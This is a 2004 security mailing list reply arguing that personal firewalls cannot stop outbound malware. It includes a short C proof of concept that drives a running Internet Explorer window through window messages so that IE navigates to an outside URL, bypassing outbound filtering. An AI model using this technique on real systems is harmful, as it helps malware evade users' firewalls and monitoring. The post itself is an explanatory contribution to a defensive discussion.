Security Basics mailing list archives
Re: Windows Messenger Pop-up spam
From: Ansgar -59cobalt- Wiechers <bugtraq () planetcobalt net>
Date: Thu, 9 Dec 2004 23:43:51 +0100
On 2004-12-09 Michael Painter wrote:
On 2004-12-08 "Ansgar -59cobalt- Wiechers" wrote:You need to think in terms of users who aren't as savvy as you. You are putting absolutley no outbound checks in place.Those checks are useless if the malware isn't as braindead as Personal Firewalls are. Like I said above: it takes 25 LoC to sneak around them. *All* of them.Could you talk a little more about this? ZoneAlarm Pro alerts me when IE6 has been changed, so I'd like to understand exactly what you're saying (not asking for the code, btw.<g>)
IE doesn't get changed. You simply find a running instance of IE (or
create a new one) and send window messages (a form of IPC, has nothing
to do with the messenger service) to specific subwindows.
There's nothing secret about the code, BTW. Here's a basic example
written by a friend of mine that shows the principle without creating an
IE instance or hiding the IE window (both can be done with a few more
lines):
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow) {
HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
HWND wrk, tb, cbx, cb, url;
if (ie == NULL) {
MessageBox(NULL, "Run IE, or else.", "Huhu!", MB_OK | MB_ICONEXCLAMATION);
return 0;
}
wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
url = FindWindowEx(cb, NULL, "Edit", NULL);
SendMessage(url, WM_SETTEXT, NULL, "http://www.dingens.org";);
PostMessage(url, WM_SETFOCUS, 0, 0);
PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);
return 0;
}
To prevent this kind of attack, you would have to completely change the
way the windowing system of Windows works. And that's just one attack
vector. There are many others like DDE, OLE (this is used by tooleaky
IIRC) and (D)COM. Plus many PFWs have their config files world-writable
and "protect" them by just locking them. That's why PFWs are useless.
Regards
Ansgar Wiechers
--
"Those who would give up liberty for a little temporary safety
deserve neither liberty nor safety, and will lose both."
--Benjamin Franklin
Current thread:
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 01)
- RE: Windows Messenger Pop-up spam David Gillett (Dec 02)
- Re: Windows Messenger Pop-up spam 'Ansgar -59cobalt- Wiechers' (Dec 02)
- RE: Windows Messenger Pop-up spam David Gillett (Dec 03)
- Re: Windows Messenger Pop-up spam 'Ansgar -59cobalt- Wiechers' (Dec 03)
- Re: Windows Messenger Pop-up spam Kevin Davis (Dec 03)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 07)
- Re: Windows Messenger Pop-up spam Kevin Davis (Dec 08)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 09)
- Re: Windows Messenger Pop-up spam Michael Painter (Dec 10)
- Message not available
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 13)
- Re: Windows Messenger Pop-up spam 'Ansgar -59cobalt- Wiechers' (Dec 02)
- RE: Windows Messenger Pop-up spam David Gillett (Dec 02)
- <Possible follow-ups>
- Re: Windows Messenger Pop-up spam Kevin Davis (Dec 01)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 02)
- Re: Windows Messenger Pop-up spam Kevin Davis (Dec 03)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 02)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 02)
- Re: Windows Messenger Pop-up spam H Carvey (Dec 03)
- Re: Windows Messenger Pop-up spam H Carvey (Dec 03)
- RE: Windows Messenger Pop-up spam Steven Trewick (Dec 07)
- RE: Windows Messenger Pop-up spam Harlan Carvey (Dec 07)
- Re: Windows Messenger Pop-up spam Ansgar -59cobalt- Wiechers (Dec 08)